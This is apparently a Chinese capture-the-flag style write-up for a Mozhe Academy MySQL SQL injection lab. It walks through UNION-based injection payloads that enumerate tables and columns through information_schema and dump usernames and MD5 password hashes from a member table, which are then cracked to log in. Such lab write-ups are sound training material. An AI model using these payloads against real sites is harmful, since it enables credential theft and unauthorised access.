SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)
SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)
地址:https://www.mozhe.cn/bug/djdsS0VVb0sxVytXY0NKMXZUeGJ4dz09bW96aGUmozhe?page=3
解题过程
- 寻找可注入网页,原网页尝试任意账密登录后地址栏没有回显,发现点击下图中的通知网页后地址栏信息为 http://219.153.49.228:47011/new_list.php?id=1 //可能存在注入点
- 寻找回显,构造Payload分别进行注入 ?id=1 and 1=1 – ?id=1 and 1=2 –
说明存在注入点;
- 查询字段(列)数:字段数为4 ?id=1 order by 4 – or ?id=1 order by 5 –
- 确认回显位置:2,3 均为回显位 ?id=-1 union select 1,2,3,4 –
- 查询数据库名以及数据库版本:mozhe_Discuz_StormGroup ?id=-1 union select 1,database(),version(),4 –
- 查询数据表:StormGroup_member,notice ?id=-1 union select 1,group_concat(table_name),version(),4 from information_schema.tables where table_schema=database() –
- 查询字段:id,name,password,status ?id=-1 union select 1,group_concat(column_name),version(),4 from information_schema.columns where table_name=‘StormGroup_member’ and table_schema=database() –
- 查看字段内容: ?id=-1 union select 1,group_concat(id,0x3a,name,0x3a,password,0x3a,status),3,4 from StormGroup_member –
- 经查询得到两条数据,观察可得用户名name=‘mozhe’ status(状态)一个为1,一个为0,考虑为1的密码是正确密码,经md5解密
- 登录原网页,拿到key:
